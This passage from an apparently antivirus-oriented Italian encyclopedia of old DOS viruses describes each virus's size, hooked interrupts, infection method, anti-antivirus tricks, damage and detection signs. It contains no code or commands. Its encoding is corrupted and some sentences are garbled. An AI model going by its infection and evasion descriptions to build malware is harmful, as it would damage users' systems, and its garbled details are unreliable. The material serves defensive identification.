l'INT 21h e controlla che il COMMAND.COM che ha avviato il sistema sia infetto. Se "NO", il virus lo infetta e ritorna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H (AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. Danni: Sovrascrive il file originales con il codice del virus, questo corrompe i file. [Mini-207] Nome del Virus: Mini-207. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 207 Byte. Procedura eseguita: Cerca tutti i file non infetti con estensione *.COM nella directory in uso, poi li infetta. Note: 1) Non rimane in memoria. 2) Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. Danni: Sovrascrive il file originale con il codice del virus, questo corrompe i file. [Brother_300] Nome del Virus: Brother_300. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 300 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.EXE, ne crea uno nuovo con estensione *.COM con lo stesso nome del primo. Questo nuovo file con estensione *.COM contiene il virus. La sua lunghezza Φ di 300 Byte. Danni: Nessuno. Metodo di rilevazione: Controllare che la lunghezza dei file sia di 300 Byte. [Lip-286] Nome del Virus: Lip-286. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 286 Byte. Procedura eseguita: Cerca i file non infetti con estensione *.COM nella directory in uso, quindi li infetta. Infetta due o tre file alla volta. Danni: C'Φ un flag nella procedura del virus (ogni file infetto ha un flag diverso). Il flag diminuisce di 1 ogni volta che il virus infetta un nuovo file. Quando il flag diventa zero, il virus distrugge tutti i dati sull'hard disk. Note: 1) Non rimane in memoria. 2) Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 286 Byte. [Gomb] Nome del Virus: Gomb. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 4.093 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.COM fil, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 4.093 Byte. [Bert] Nome del Virus: Bert. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 2.294 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.COM o *.EXE, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 2.294 Byte. [Triple Shot] Nome del Virus: Triple-shot. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 6.610 Byte. Procedura eseguita: Cerca i file non infetti con estensione *.EXE nella directory corrente. Quindi crea un nuovo file nascosto con estensione *.COM con il nome del file di estensione *.EXE. Questo nuovo file con estensione *.COM Φ il virus. La sua lunghezza Φ di 6.610 Byte. Danni: Nessuno. Note: 1) Non rimane in memoria. 2) Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. Metodo di rilevazione: Controllare che la lunghezza dei file sia di 6.610 Byte. [Fame] Nome del Virus: Fame. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 896 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.EXE, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 896 Byte. [CCCP] Nome del Virus: Cccp. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 510 Byte. Procedura eseguita: Cerca i file non infetti con estensione *.COM nella cartella in uso, quindi li infetta. Infetta due o tre file alla volta. Danni: C'Φ un flag (con valora da 0 a 25) nella procedura del virus (ogni file infetto ha un flag diverso). Quando un file infetto con flag di 25 viene eseguito, il virus distrugge tutti i dati sull'hard disk. Note: 1) Non rimane in memoria. 2) Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 510 Byte. [L1] Nome del Virus: L1. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 140 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. Danni: Nessuno. Note: 1) Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 140 Byte. [Crepate] Nome del Virus: Crepate. Tipo di Virus: Virus da file. Il virus infetta i file con estensione *.COM di lunghezza compresa tra 400 e 62.000 Byte ed i file con estensione *.EXE minori di 589.824 Byte. Il virus risiede nei blocchi di memoria. Lunghezza del Virus: 2.910 Byte (file), 4K Byte (memoria). Vettore PC aganciato: INT 21h. Processo di infezione: Ogni file infetto aumenta di 2.910 Byte, con il codice del virus alla fine di alcuni tipi di header creati dal virus. Il secondo gruppo di Byte indicante l'ora di creazione del file, Φ impostato su 31 (1Fh). Ad ogni sucessiva infezione, il virus reimposta la memoria di sistema dall'indirizzo 0:413 al 280h (640 K). Danni: Il virus formatta l'hard disk. Sintomi: Perdita dei dati scritti negli ultimi 7 settori del dischetto, Perdita dei dati scritti nell'ultimo cilindro, primo lato, primi 7 settori, Aumento di lunghezza dei file. Note: Questo virus non infetta i file chiamati: "*AN.???" o "*LD.???" Per evidenziare la presenza del virus nel settore di boot, si possono cercare: - un byte segnato FFh nell'offset 4 nei floppy disk. - una parola segnata con 2128h nell'offset 4 nell'hard disk. Inoltre alla fine di ogni file infetto pu≥ essere trovata la seguente stringa: "Crepa (C) bye R.T.". Questo testo potrebbe essere leggermente diverso. Il comando DOS Chkdsk, quando il virus Φ residente, rivela una diminuzione di 4K Byte nella memoria disponibile. [Die Lamer] Nome del Virus: DIE LAMER. Tipo di Virus: Residente in cima alla MCB (Memory Control Block). Lunghezza del Virus: 1.136 Byte. Vettore PC agganciato: INT 21h. Processo di infezione: Questo virus si diffonde eseguendo un programma infetto. Quando viene eseguito un programma infettattato con DIE LAMER, per prima cosa controlla che sia giα residente in memoria verificando che l'indirizzo 0:4f2h contenga il valore 3232h. Se Φ giα residente in memoria, esegue il programma infetto. Danni: Perdita di alcuni dati presenti sul floppy. Sintomi: Informazioni parassite nel floppy aumentano la misura dei file. Sullo schermo compare il seguente messaggio: "-=*@DIE_LAMER@*=-." Note: Il metodo usato dal virus Φ molto pericoloso, perchΘ se un programma anti-virus individua questo virus nella memoria e mostra il messaggio: "found '-=*@DIE_LAMER@*=-' in memoria", il virus scrive solo informazioni parassite sul floppy, ma il programma del virus pu≥ essere leggermente modificato per eseguire procedure pi∙ distruttive (come formattare l'hard disk, etc...). [FaxFree] Nome del Virus: FAXFREE. Tipo di Virus: Virus da file. Il virus infetta i file con estensione *.COM e *.EXE maggiori di 32 Byte e minori di 131.072 Byte. Infetta la tabella delle partzioni. Lunghezza del Virus: 3 Kb. Vettore PC agganciato: INT 21h. Processo di infezione: Questo virus si diffonde eseguendo un programma infetto od avviando il sistema con un dischetto infetto. Vi sono diversi metodi di infezione. Quando un programma infetto viene eseguito in un sistema pulito, il virus dapprima rimuove il contenuto del settore delle partizioni dell'hard disk dall'ultimo settore dell'ultimo lato dell'ultimo cilindro. Quindi il virus si copia nell'ultimo lato dell'ultimo cilindro, iniziando dagli ultimi 9 settori agli ultimi sei. Questi settori non vengono marcati come "bad sectors" e sono sovrascritti dal virus, senza riguardo per il contenuto. Danni: Blocca il sistema. I file infetti aumentano di 2.048 Byte, con scritto il codice del virus. Sintomi: Quando il viru svuole ripristinare l'originale settore delle partizioni, deve decifrare alcuni dati. Dopo essere stati decifrati compare la seguente stringa: "PISello tenere fuori dalla portata dei bambini. PaxTibiQuiLegis.FaxFree!!" Note: Questo virus non infetta i file chiamati: "*AN.???" , "*OT.???" o "*ND.???" Se la data del sistema Φ compresa tra il 25 e il 30 aprile, il virus blocca il sistema. Il virus usa una tecnica particolare per evitare di essere riconosciuto dai programmi anti-virus; quando modifica il settore delle partizioni agganciando l'int 01h, attiva un singolo flag per ottenere il punto di ingresso intercettato dal DOS. Il virus si sposta in cima alla MCB (Memory Control Block) e diminuisce la memoria accessibile nella MCB di 3Kb. Intercetta l'Int 13h e l'Int 21h quindi esegue il programma originale. [Ghost Player] Nome del Virus: GHOST PLAYER. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Residente in memoria. Lunghezza del Virus: 1.200 Byte. Vettore PC agganciato: INT 21h. Processo di infezione: Questo virus si diffonde eseguendo un programma infetto. Quando viene eseguito un programma infettato da GHOST PLAYER, se la versione del DOS Φ superire a 3 e il numero di serie del disco Φ di default uguale a 0, il virus esegue il programma infetto. Altrimenti il virus regola le seguenti funzioni: rimane residente in cima alla MCB (memoria control block) ma nel limite dei 640K del DOS. La memoria libera diminuisce di 1.200 (4B0H) Byte. Danni: Il virus aumenta la lunghezza dei file. Sintomi: Diminuisce la memoria accessibile. Il virus mostra il seguente messaggio : " ! Bumpy" Inoltre lo scherno si muove in su e in gi∙. Note: Il virus i file chiamati : "TB*.???" , "F-*.???" , "CP*.???" , "NA*.???" , "SC*.???" "CL*.???" or "V*.???". [Gold Bug] Nome del Virus: GOLD-BUG. Tipo di Virus: Residente nel Generatore di Colori del Video e nel e e Extended HMA Memory, Infetta il settore di boot ed il settore master. Lunghezza del Virus: 1.024 Byte. Vettore PC agganciato: INT 21h, INT 13h. Processo di infezione: GOLD-BUG Φ un virus residente in memoria, multipartito, polimorfo, con tecnica stealth, del settore di boot, produttore di anti-antivirus che lavora con il DOS 5 e il DOS 6 nella memoria di HIMEM.SYS. Quando viene eseguito un file infetto con estensione *.EXE con GOLD-BUG attivo, il virus controlla che stia girando su un 80186 o maggiore. Se "NO", termina l'esecuzione e non si installa. Se "SI", copia se stesso sulla tabella delle partizioni dell'hard disk e resta in memoria alta (HMA); i.e., DOS=HIGH anche nel file CONFIG.SYS altrimenti non avviene l'infezione. La vecchia tabella delle partizioni Φ spostata al settore 14 e il rimanente del codice del virus Φ copiato al settore 13. Il virus esegue il file associato se presente. L'INT 13 e l'INT 2F sono agganciati in questo momento, l'INT 21 no. La caratteristica diffusione di questo virus non Φ attiva adesso. Danni: Il virus GOLD-BUG possiede anche una potente procedura anti-antivirus. Scrive sul disco usando l'originale INT 13 del BIOS e non aggancia l'INT 13 che questi tipi di programmi possiedono. Intercetta l'INT insieme all'interrupt correlato, anzichΦ intercettare e legarsi agli interrupt. Se il virus GOLD-BUG Φ in memoria, ogni tentativo di usare anti virus fallisce. GOLD-BUG blocca ogni file con estensione *.EXE (maggioiore di 64k) con le ultime due lettere "AN" o "AZ". Blocca SCAN.EXE, CLEAN.EXE, NETSCAN.EXE, CPAV.EXE, MSAV.EXE, TNTAV.EXE, e cos∞ via. I programmi di scansione sono cancellati o vi sono degli errori nell'esecuzione. Inoltre GOLD-BUG causa un fallimento del check sum di CMOS che avviene al successivo avvio del sistema. GOLD-BUG cancella anche "CHKLIST.???", creati da CPAV.EXE e MSAV.EXE. I programmi che eseguono un check sum interno non mostrano cambiamenti. Sintomi: Fallisce il checksum di CMOS. Crea un file senza estensione; i modem rispondono al settimo squillo. La maggior parte degli anti virus non viene avviata o viene cancellata. I file CHKLIST.??? sono cancellati. Note: Il virus GOLD-BUG Φ anche polimorfo. Ogni file con estensione *.EXE che crea ha solo 2 Byte costanti. Pu≥ cambiare la cifratura in 128 modi diversi. Usa una doppia tecnica di decriptazione che coinvolge l'INT 3 che lo rende difficilmente decifrabile usando un programma di ricerca e correzione degli errori. L'insieme del codice tiene conto di 512 diversi decifratori testa -coda. Ognuno pu≥ cambiare 128 volte. [Invisible Man] Nome del Virus: INVISIBLE MAN. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE), Di partizione, Di avvio, Residente in Memoria. Lunghezza del Virus: 2.926 Byte (file), D80h Byte (memoria). Vettore PC agganciato: INT 21h. Processo di infezione: Questo virus si diffonde eseguendo un proramma infetto od avviando il sistema con un disco infetto. Vi sono diversi metodi di infezione: (1). Quando si esegue un programma infettato da INVISIBLE MAN pu≥ accadere: A. Infetta la tabella delle partizioni dell'hard disk: (i) Il virus scrive il priprio codice sugli ultimi 7 settori dell'hard disk in uso. (ii) La locazione finale del disco in uso dell'hard disk diminuisce di 7 settori. (iii) Scrive sul settore delle partizioni. Questo settore viene criptato. B. Modifica il settore di boot: Cambia il numero totale del numero dei settori, diminuito di 7 rispetto al numero originale. Danni: Il virus mostra un messaggio e suona una canzone dagli altoparlanti del sistema. Sintomi: Perdita dei dati contenuti negli ultimi 7 settori dell'hard disk; La misura dei file aumenta di 2.926 Byte. Il virus mostra il seguente messaggio: "I'm the invisible man, I'm the invisible man Incredible how you can See right through me." Il virus suona una canzone dagli altoparlanti del sistema. [Junkie] Nome del Virus: Junkie. Tipo di Virus: Multipartito, Residente in memoria. Lunghezza del Virus: 512 Byte. Vettore PC agganciato: INT 21h. Processo di infezione: Quando Φ in esecuzione un programma infetto, il virus si installa in memoria e rimane residente nel programma. Sull'area di sistema dell'hard disk, il virus copia due settori di 512-Byte del proprio codice sulla prima traccia dell'hard disk. Il virus modifica il Mster Boot Record dell'hard disk affinchΦ possa leggere i settori aggiunti e li esegua in fase di avvio. Danni: Il virus aggiunge circa 1.024 Byte del codice del virus alla fine dei file infetti. [March 25th] Nome del Virus: March-25th. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). MARCH-25H infetta i file con estensione *.EXE e *.COM minori di 196.608Byte. Lunghezza del Virus: 1.056 Byte. Vettore PC agganciato: INT 21h. Processo di infezione: Questo virus si diffonde eseguendo un programma infetto. Quando un programma infettato da MARCH-25H Φ in esecuzione, verifica che sia giα residente in memoria controllando l'indirizzo 0:212h contenente il valore F100h. Se Φ giα in memoria esegue il programma infetto. Il virus rimane residente in cima al MCB (Memoria Control Block) ma sotto il limite dei 640k del DOS. La memoria libera diminuisce di 1.056 (420H) Byte. Infetta i file con estensione *.EXE e *.COM quando vengono eseguiti dall'hard disk. Danni: Il virus distrugge l'hard disk. La lunghezza del file infetti aumenta di 1.025 - 1.040 (401h - 410h) Byte con il virus alla fine del file. Sintomi: Il virus causa la perdita di dati dal drive C. Note: Se la data del sistema Φ il giorno 25 marzo di qualsiasi anno, il virus scrive informazioni parassite su: drive C settore 0 - 6 , cilindro 0 , head 0 drive C settore 1 - 7 , cilindro 1 , head 0 drive C settore 1 - 7 , cilindro 2 , head 0." [Minosse] Nome del Virus: MINOSSE. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE), MBR. Lunghezza del Virus: 5.772 Byte. Vettore PC agganciato: INT 21h. Processo di infezione: MINOSSE Φ un virus polimorfo che evita il programma di Debug.exe. Quando viene eseguito un programma infettato da MINOSSE, il virus si comporta nel seguente modo: 1. Intercetta l'Int 8xh - Int 9xh: (x: qualsiasi numero). Prima intercetta l'Int 8xh - 9xh, quindi attiva questo interrupt per permettere al virus di entrare e decifrare il corpo del virus. 2. Il virus rimane residente in cima al MCB (Memoria Control Block) ma sotto il limite dei 640k del DOS. Danni: Il virus blocca il sistema quando la data di sistema Φ sucessiva a giugno e il giorno Φ 25. I file infetti aumentano di 3.075 Byte con il virus alla fine del file. La memoria libera diminuisce di 5.772 Byte. Sintomi: Diminuisce la memoria accessibile. Viene mostrato il seguente messaggio: "Minose 1V5 (c) 93 WilliWonka." Note: Questo Φ un virus polimorfico. Non Φ facile evidenziarlo con i programmi di scansione perchΘ non ha lo stesso codice dello scanner e non Φ facile individuarlo usando il vettore agganciato perchΘ ricopre l'int 21h con il vettore originale. [Mombasa] Nome del Virus: MOMBASA. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 3.584 Byte. Vettore PC agganciato: INT 21h, INT 08h. Processo di infezione: MOMBASA Φ un virus polimorfico ed usa l'INT 01h e l'INT 03h per non lasciare tracce. Quando viene eseguito un programma infettato da MOMBASA succede quanto segue: Rimane residente in cima al MCB (Memoria Control Block) ma sotto il limite dei 640k del DOS. La memoria libera diminuisce di 3.584 Byte. Infetta i file con estensione *.EXE e *.COM quando vengono eseguiti dall'hard disk. Intercetta l'INT 08h per controllare che l'INT 21h non sia stato cambiato da un altro programma. Se l'INT 21h Φ stato modificato, il virus cambia il proprio vettore con l'INT 21h ed intercetta nuovamente il l'INT 21h. Infetta i programmi con estensione *.COM e cerca di infettare i C:\COMMAND.COM quando vengono eseguiti. Mentre MOMBASA Φ residente in memoria nasconde la diversa lunghezza del file perchΘ il virus riprende la lunghezza originale del file. Quando si crea od elimina una directory o si seleziona un drive come A: o B:, il virus scrive alcuni dati sul disco/dischetto, ma senza successo. Danni: Schiarisce lo schermo fino a farlo diventare bianco. Quindi il sistema si blocca. Il virus distrugge il settore di boot e nella FAT dell'hard disk. La lunghezza del file infetti aumenta di 3.568 Byte con il virus alla fine del file. Sintomi: Il virus mostra il seguente messaggio : "I'm gonna die...Attack radical...Mombosa virus (MM 92')." [NOV-17-768] Nome del Virus: NOV-17-768. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM minori di 59.920 Byte ed i file con estensione *.EXE). Lunghezza del Virus: 768 Byte (file), 800 Byte (memoria). Vettore PC agganciato: INT 21h. Processo di infezione: Questo virus Φ una variante del virus November-17th. Il virus November 17th fu individuato nel gennaio 1992. Non si conosce la provenienza, ma la sua diffusione si ebbe a Roma, nel dicembre 1991. November 17th infetta i file con estensione *.COM ed *.EXE compreso il COMMAND.COM. La prima volta che viene eseguito il programma infetto, il virus si installa in cima alla memoria di sistema ma nel limite dei 640k del DOS. Danni: Il virus distrugge il disco in uso dal settore 1 a 8. La memoria totale di sistema, come indicato dal programma DOS CHKDSK, diminuisce di 896 Byte. Il ritorno dell'Interrupt 12's non viene spostato. Vengono intercettati gli Interrupts 09 e 21. Sintomi: I file infetti aumentano di 855 Byte con il virus alla fine del file infetto. Non ci sono variazioni visibili di ora e data nella lista delle directory del DOS. [NOV-17-800] Nome del Virus: NOV-17-800. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE), Residente in memoria. Il virus non infetta "SCAN", "CLEAN." Lunghezza del Virus: 800 Byte (file), 832 Byte (memoria). Vettore PC agganciato: INT 09h e 21h. Processo di infezione: La prima volta che viene eseguito il programma infetto, il virus si installa in cima alla memoria di sistema ma nel limite dei 640k del DOS. Danni: Il virus altera la FAT dell'hard disk. Quando viene variato il valore di [00:46E] ed il mese Φ = 1, il virus scrive informazioni parassite sui sttori da 1 a 8. Sintomi: La misura dei file aumenta di 800 Byte. Diminuisce la memoria accessibile di 800 Byte. [Protovir] Nome del Virus: PROTOVIR. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM), Residente in memoria alta. Lunghezza del Virus: 730 Byte (file), 270 Byte (memoria). Vettore PC agganciato: INT 21h. Processo di infezione: Il virus infetta i file con estensione *.COM quando vengono eseguiti. I file infetti aumentano di 730 Byte con il virus alla fine del file. Il virus aggiorna i primi 7 Byte, mettendo all'inizio del file il codice virale e aggiungendo i primi 7 Byte alla fine del file infetto. Danni: Aumenta la misura dei file. Diminuisce la memoria accessibile. Sintomi: La memoria accessibile diminuisce di 720 Byte. [Red Spider] Nome del Virus: RED SPIDER. Tipo di Virus: Virus da file. Il virus infetta i file con estensione *.COM con lunghezza compresa tra 2.000 (7D0H) e 63.500 (F80CH) Byte. I file infetti con estensione *.EXE sono minori di 524.288 (80000H) Byte. Il virus Φ residente nei blocchi di memoria. Lunghezza del Virus: 949-964 Byte (file). Vettore PC agganciato: INT 21h. Processo di infezione: Il virus si installa in cima alla memoria di sistema ma nel limite dei 640k del DOS. Il virus infetta i file con estensione *.EXE e *.COM che vengono eseguiti. I file infetti aumentano di 949 - 964 Byte con il virus alla fine del file. Danni: Incremanta la lunghezza dei file. Diminuisce la quantitα di memoria utilizzabile. Sintomi: La memoria libera diminuisce di 976 Byte. Note: Se il COMMAND.COM viene infettato, la lunghezza del file non cambia. Questo virus non infetta. La seguente stringa pu≥ essere trovata cifrata nel codice del virus: "Red Spider Virus created by Garfield from Zielona Gora in Feb 1993 ....... " [Hello Shshtay] Nome del Virus: HELLO-SHSHTAY. Tipo di Virus: Virus da file. Virus infetta i file con estensione *.COM minori di 63.776 Byte ed i file con estensione *.EXE minori di 52428 Byte. Il virus Φ residente in memoria. Lunghezza del Virus: 1.840-1.855 Byte (EXE), 1.600-1.615 Byte (COM), 1.792 Byte (memoria). Vettore PC agganciato: INT 21h. Processo di infezione: Il virus risiede in cima alla MCB (memoria control block) ma nel limite dei 640K del DOS. La memoria libera diminuisce di 1.792 Byte. Il virus infetta i file con estensione *.EXE e *.COM quando vengono eseguiti. I file infetti con estensione *.EXE aumentano di 1.840-1.855 Byte ed i file infetti con estensione *.COM aumentano di 1.600-1.615 Byte con il virus alla fine del file in entrambi i casi. Danni: Aumenta la lunghezza dei file. Diminuisce la memoria accessibile. Sintomi: Il virus mostra il seguente messaggio : "HELLO SHSHTAY" "GODBYE AMIN " "HELLO SHSHTAY" " ZAGAZIG UNIV" Note: Se la data di sistema Φ uguale o successiva a gennaio 1994, il virus intercetta l'INT 1Ch, l'INT 09h ed imposta il contatore = 0. L'Interrupt 1ch aggiunge uno al contatore 18.2 volte al secondo. Quando il contatore Φ superire o uguale a 3.786 (ECAh) attiva l'INT 09h e reimposta il contatore a zero 0. Quando l'Interrupt 09h Φ attivato, mette un messaggio nel buffer della tastiera, cos∞ ogni 208 (3786/18.2) secondi viene mostrato un messaggio sullo schermo. [Star Dot] Nome del Virus: STARDOT. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 592-608 Byte (file). Vettore PC agganciato: INT 21h. Processo di infezione: Il virus infetta solo i file con estensione *.EXE quando vengono eseguiti. La lunghezza del file aumenta di 592 - 608 Byte con il virus alla fine del file. Quando il virus esegue un programma pulito, aggiunge un contatore e scrive questo valore ed il corpo del virus nel programma non infetto, cos∞ il virus acquisisce il giorno della settimana e lo confronta con i 3 bit pi∙ bassi del contatore. Se i valori corrispondono, distrugge settori del disco, scelti a caso, per 8 volte. Se il valore del contatore Φ uguale a 63 (3Fh), invia dei dati scelti a caso alla porta I/O del sistema (from 380h to 3DFh). Danni: Il virus distrugge i settori sul disco in uso ed invia dei dati scelti a caso alla porta I/O del sistema. Sintomi: Perdita di dati dal disco ed aumento della misura dei file. [Stunning Blow] Nome del Virus: STUNNING BLOW. Tipo di Virus: Virus da file Infetta i file con estensione *.EXE che non inizino con le lettere: "TB","F-","CP","NA","SC","CL","V." Residente in memoria Lunghezza del Virus: 1.237 Byte (file), 1.392 Byte (memoria). Vettore PC agganciato: INT 21h. Processo di infezione: Questo virus si attiva i giorni 4, 8, 12, 16, 20, 24, e 28 di ogni mese, dopo l'iniziale indugio di un mese. Procedura eseguita: (1) Intercetta l'interrupt 08h, contatore = FFD0h. (2) Diminuisce il valore del contatore di 18.2 al secondo. (3) Quando il contatore Φ a zero comincia a suonare una musica. Questo virus si attiva anche quando casualmente Φ = -1 e mostra il seguente messaggio: " Stunning Blow (R) Ghost Player Italy." Danni: Il virus cancella i file con estensione *.CPS. Sintomi: Perdita di alcuni file con estensione *.CPS ed aumento della lunghezza dei file. Diminuisce la memoria accessibile. [Sunrise] Nome del Virus: SUNRISE. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 1.033 Byte (file), 80 Byte (memoria). Vettore PC agganciato: INT 21h. Processo di infezione: Nella directory principale del disco in uso, il virus cerca l'ultima subdirectory. Modifica questa subdirectory e tutte le successive subdirectory. Il virus cerca di infettare un file non infetto con estensione *.EXE. Controlla il numero seriale del disco. Se Φ uguale a 0 ed una parola Φ uguale a 2Dh, mostra il seguente messaggio: "* Sun Rise * EpidemicWare G.I.P.Po oct-93." E' intercettato l'Interrupt 08h. Se il mese in cui Φ stato infettato il file in esecuzione non corrisponde al mese in corso, il virus intercetta l'INT 08h. Questo causa: (i) Il virus risiede in cima alla MCB (memoria control block) ma nel limite dei 640K del DOS. (ii) Diminuisce la memoria libera di 80 Byte. (iii) Assegna il valore BDD8h al contatore e lo diminuisce di 18.2 ogni secondo. Quando il contatore Φ a zero lo schermo diventa bianco e viene fatto scorrere il contenuto originale. DopodichΘ il sistema torna normale. (iv) Assegna il valore di 1.518h al contatore e ripete i passi (ii), (iii) e(iv). Danni: Il virus intercetta l'INT 8h. A certi intervalli lo schermo diventa bianco e scorre. Sintomi: Aumenta la lunghezza dei file. Diminuisce la memoria accessibile. [Thule] Nome del Virus: THULE. Tipo di Virus: Virus da file. Virus infetta i file con estensione *.COM minori di 61.054 Byte. Virus residente in memoria. Lunghezza del Virus: 309 Byte (I file con estensione *.COM), 68 Byte (memoria). Vettore PC agganciato: INT 21h. Processo di infezione: Questo virus sposta il codice virale a 0:200h-0:243h ed intercetta l'Int 21h per cancellare un file chiamato "THULE.COM." Quando DOS cambia la directory in uso, cerca di aprire "THULE.COM" nella directory corrente. Quando trovato, questo file viene cancellato. Danni: Viene cancellato il file "THULE.COM". Sintomi: Aumenta la lunghezza dei file. Un file Φ cancellato. [Topa 1.20] Nome del Virus: TOPA 1.20. Tipo di Virus: Virus da file. Il virus infetta i file con estensione *.COM di lunghezza compresa tra 2.712 e 60.000 Byte. I file infetti con estensione *.EXE di lunghezza compresa tra 5.424 e 524.288 Byte. Residente in memoria. Lunghezza del Virus: 2.456-2.471Byte (I file con estensione *.EXE), 2.456 Byte (I file con estensione *.COM), 5.536 Byte (memoria). Vettore PC agganciato: INT 1Ch, INT 21h. Processo di infezione: Questo virus si diffonde eseguendo un programma infetto. Quando viene eseguito un programma infetto, controlla che il registro AX= 4290h, l'INT 21 ed il valore di ritorno del registro AX = 9047 indichino che sia ancora residente in memoria. Se "SI", il virus esegue il programma infetto. Se "NO", il virus esegue quanto segue: 1) Cambia la strategia di archiviazione della memoria bassa, quindi rimane residente in MCB (memoria control block). La memoria libera disponibile diminuisce di 5.536 (15A0H) Byte. 2) Una volta che il virus TOPA_1.2 Φ in memoria, intercetta l'Int 1Ch e l'Int 21h per infettare i file. Danni: Diminuisce la memoria accessibile. Sintomi: Aumenta la lunghezza dei file. [Topo] Nome del Virus: TOPO. Tipo di Virus: Virus da file. Il virus infetta i file con estensione *.EXE minori di 524.288 Byte. Residente in memoria. Lunghezza del Virus: 1.536-1.552 Byte (file), 3.616 Byte (memoria). Vettore PC agganciato: INT 21h. Processo di infezione: Questo virus si diffonde eseguendo un programma infetto. Quando Φ eseguito un programma infettatto da TOPO, dapprima intercetta l'INT 3 quindi usa questo interrupt per nascondere il proprio codice. Il virus verifica che sia giα residente in memoria controllando l'indirizzo 0:3feh contenente il valore 0011h. Se il virus Φ giα in memoria, esegue il programma infetto. Non infetta i file chiamati: *AN.EXE e *LD.EXE, dove "*" Φ un carattere wildcard. Danni: Il virus altera i parametri del dischetto (00:525h - 0:52Ch) e mostra il seguente messaggio : "R(etry), I(gnore), F(ail), or A(bort) ?" Sintomi: Aumenta la lunghezza dei file e rende impossibile la lettura di certi file. Diminuisce la memoria accessibile. Note: Se la data del sistema Φ il giorno 25 o 26 di qualsiasi mese, appare il messaggio sopra riportato. [Bloody Warrior] Nome del Virus: BLOODY-WARRIOR. Tipo di Virus: Residente in cima alla MCB (memoria control block). Lunghezza del Virus: 1.344 Byte (file), 2.768 Byte (memoria). Procedura eseguita: Il virus infetta i file con estensione *.COM ed .EXE finchΦ il file con estensione *.COM diventa pi∙ piccolo di EA60h Byte. Non infetta i seguenti file: "SCAN", "STOP", "SHIELD", "CLEAN", "CV", "DEBUG", "TD." Questo virus pu≥ diffondersi solo attraverso un programma infetto. Danni: Il virus distrugge i settori del disco dal 1 al 256. In seguito scrive informazioni parassite sul disco in uso, dal settore 1 al 256, dal giorno 4 luglio in avanti, solo in questo mese. Metodo di rilevazione: I file infetti aumentano di 1.344 Byte. Sintomi: 1. Il virus risiede in cima alla MCB (memoria control block) ma nel limite dei 640K del DOS. La memoria libera diminuisce di 2.768 Byte. 2. Intercetta l'interrupt 21h: Quando BLOODY-WARRIOR Φ residente in memoria, per infettare i file, il virus prende il controllo delle seguenti funzioni: - carica ed esegui (AX=4B00h) - apri (AH=3Dh) - acquisisce ed imposta l'attributo del file (AH=43h) - rinomina un file (AH = 56h) Infetta i file con estensione *.COM ed *.EXE eseguiti, aperti, modificati gli attributi dei file, o quando vengono rinominati. Non infetta i file con estensione *.COM maggiori di EA60h Byte. I programmi infetti aumentano di 1.344 Byte con 